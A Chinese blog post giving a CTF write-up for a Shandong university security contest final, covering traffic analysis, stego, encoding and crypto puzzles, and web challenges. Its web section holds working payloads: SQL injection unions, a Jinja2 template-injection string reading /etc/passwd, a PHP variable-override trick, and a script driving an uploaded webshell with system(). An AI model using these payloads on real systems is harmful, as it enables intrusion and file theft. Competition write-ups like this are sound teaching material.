J0k3r's Blog主页归档标签友链kindle关于我
第七届山东省大学生网络安全技能大赛决赛Writeup

点击阅读

感觉难度不是特别大,不过自己太菜了,很多分不该失

特殊后门

从通信方式的角度看,后门可分为http/https型、irc型、dns型、icmp型等等。安全人员抓到一份可疑的流量包,请从中分析出利用某种特殊协议传输的数据。

这里是通过icmp,直接过滤出来

第一个icmp就给了提示

接着每个icmp包里都有一个flag字符,拼起来即可

flag{Icmp_backdoor_can_transfer_some_information}

weblogic

首先在分组详情中搜索hostname字符串,接着追踪tcp流,在tcp流中再次查找hostname字符串

16进制很明显了

flag{6ad4c5a09043}

日志分析

有点长,比赛时手撕的。。

赛后了,就写个脚本吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#coding:utf-8
import urllib
import re

data = []

file = open('log.txt','wb')

def decode_and_write(a):
    tmp = urllib.unquote(a)
    if '200' and 'flag_is_here' and 'RCKM' in tmp and '404' not in tmp:
        file.write(tmp)

with open('access.log') as f:
    for el in f.readlines():
        decode_and_write(el)
file.close()

i = 0
flag = ''
with open('log.txt','rb') as ff:
    i = i + 1
    char = ''
    for el in ff.readlines():
        num1 = re.findall(r'AND ORD\(MID\(\(SELECT IFNULL\(CAST\(flag AS CHAR\),0x20\) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1\),(.*?),1\)\)>.*?',el)
        num2 = re.findall(r'AND ORD\(MID\(\(SELECT IFNULL\(CAST\(flag AS CHAR\),0x20\) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1\),.*?,1\)\)>(.*?) AND',el)
        if num1[0] == str(i):
            char = chr(int(str(num2[0])))
        else:
            flag += chr(ord(char)+1)
            i = i + 1
            if num1[0] == str(i):
                char = chr(int(str(num2[0])))

print flag

ff.close()
f.close()

少个}

啊哒

foremost分离出图片内的压缩包

压缩包密码在图片详细信息中

flag{3XiF_iNf0rM@ti0n}

神秘的文件

zip明文攻击

将得到的docx改为.zip,解压,docProps文件夹内有flag.txt

base64解码就好

flag{d0cX_1s_ziP_file}

basic

明显RGB画图了,就是135000开不了平方,测试150x900是最好的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from PIL import Image

pic = Image.new("RGB",(150, 900))
fo = open("basic.txt","r")
pics = []
i=0
while True:
    if i == 135000: 
        break
    a = fo.readline()
    pics.append(a)
    i = i + 1
str = ""
i=0
for y in range (0,150):
    for x in range (0,900):
        s = pics[i].split(',')
        pic.putpixel([y,x],(int(s[0]), int(s[1]), int(s[2])))
        i = i+1

pic.show()
pic.save("flagg.png")

进制转换

得到如下文本:

1
d87 x65 x6c x63 o157 d109 o145 b100000 d116 b1101111 o40 x6b b1100101 b1101100 o141 d105 x62 d101 b1101001 d46 o40 d71 x69 d118 x65 x20 b1111001 o157 b1110101 d32 o141 d32 d102 o154 x61 x67 b100000 o141 d115 b100000 b1100001 d32 x67 o151 x66 d116 b101110 b100000 d32 d102 d108 d97 o147 d123 x31 b1100101 b110100 d98 d102 b111000 d49 b1100001 d54 b110011 x39 o64 o144 o145 d53 x61 b1100010 b1100011 o60 d48 o65 b1100001 x63 b110110 d101 o63 b111001 d97 d51 o70 d55 b1100010 d125 x20 b101110 x20 b1001000 d97 d118 o145 x20 d97 o40 d103 d111 d111 x64 d32 o164 b1101001 x6d o145 x7e

python转换进制即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#coding: utf-8

import re

file = open("text.txt",'r')
jin = file.read().split(' ')

data = ''

for i in jin:
    if str(i)[:1] == 'd':
        tmp = chr(int(str(i)[1:]))
        data += tmp
    if str(i)[:1] == 'x':
        data += chr(int(str(i)[1:],16))
    if str(i)[:1] == 'b':
        data += chr(int(str(i)[1:],2))
    if str(i)[:1] == 'o':
        data += chr(int(str(i)[1:],8))
print data

affine

即仿射加密

拿出珍藏的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#coding: utf-8

def affine(a, b):
    pwd_dic = {}
    for i in range(26):
        pwd_dic[chr(((a * i + b) % 26 + 97))] = chr(i + 97)
    return pwd_dic
def main():
    pwd_dic = {}
    pwd = raw_input('str: ')
    a = input('input a (c = (am + b) mod 26) : ')
    b = input('input b (c = (am + b) mod 26) : ')
    plain = []
    pwd_dic = affine(a, b)
    print(pwd_dic)
    for i in pwd:
        plain.append(pwd_dic[i])
    print("flag is :" + "".join(plain))
if __name__ == '__main__':
    main()

colors

得到七张图片,stegsolve得到

更改每张图片高度,都能得到一串小格,应该是二进制了

比赛时一直横着读的,没想到是竖着读,一个ASCII虽然8位,但最高位是0,这又有七张图片,所以还是太菜了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#coding:utf-8

c1 = '11111111010111101111'
c2 = '11111011111110111111'
c3 = '00001100101010110001'
c4 = '01001010010000001101'
c5 = '11010011011101010111'
c6 = '10011011011010110110'
c7 = '00111001101101111101'

flag = ''

for i in range(0,20):
    c = c1[i]+c2[i]+c3[i]+c4[i]+c5[i]+c6[i]+c7[i]
    flag += chr(int(c,2))

print flag

flag{Png1n7erEs7iof}

CrackIt

一个shadow文件,含加密的root密码

1
root:$6$HRMJoyGA$26FIgg6CU0bGUOfqFB0Qo9AE2LRZxG8N3H.3BK8t49wGlYbkFbxVFtGOZqVIq3qQ6k0oetDbn2aVzdhuVQ6US.:17770:0:99999:7:::

幸亏有工具john

rsa

1
2
3
4
N : 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597
e : 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619

enc : 38230991316229399651823567590692301060044620412191737764632384680546256228451518238842965221394711848337832459443844446889468362154188214840736744657885858943810177675871991111466653158257191139605699916347308294995664530280816850482740530602254559123759121106338359220242637775919026933563326069449424391192

工具一把梭

babyWeb

加XFF头和更改cookie的admin

babyWeb2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php

    include 'here.php';
    $key = 'kelaibei';

    if(isset($_GET['id'])){
        $id = $_GET['id'];
        @parse_str($id);
        if ($key[99] != 'aabg7XSs' && md5($key[99]) == md5('aabg7XSs')) {
           echo $hint;
        }
        else{
            echo 'try again';
        }
    }
    else{
        show_source(__FILE__);
    }

利用parse_str变量覆盖,paylaod:?id=key[99]=QNKCDZO

得到upl04d50m3thing.php

写入一句话,提交得到php文件链接,访问发现内容被更改,输出Too slow!

利用条件竞争,先用burp的intruder开多线程访问

再利用脚本或其他方式尝试getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#coding:utf-8
import requests

u = 'http://47.105.148.65:29002/uploads/8af92ffefda7050707590b352dfb3cd2e03d29a6/s.php'
passwd = 's'
com = 'ls -a'
payload = {passwd:'system(\''+com+'\');'}
s = requests.Session()
while 1:
    try:
        res = s.post(u,payload)
        print("[+] success\n"+res.text+"===")
    except:
        print("failed")

easy_flask

Search Comments:处存在sql注入

' order by 4# 出现错误

http://47.105.148.65:29003/?username=' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'ctf' and table_name='comment'),3%23

得到id,username,comment

但是只能在第三个字段查询,且' union select 1,2,comment from comment%23会出现和' or 1=1%23一样的Rendering Error.

出现了模版渲染错误

直接' union select 1,2,10%23测试报 Mysql Error.错误,应该是花括号原因,不过mysql支持0x开头的16进制,以16进制传入即可

1
{{ ().__class__.__bases__[0].__subclasses__()[40]("/etc/passwd").read()}}

能够正常读取

尝试查看flag

1
{{ ().__class__.__bases__[0].__subclasses__()[40]("/flag").read()}}

flag{c15f43da-481e-4131-84b2-e315719b989b}

文章作者: J0k3r
文章链接: http://j0k3r.top/2018/11/06/kelai_wp/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 J0k3r's Blog
CTFWriteUp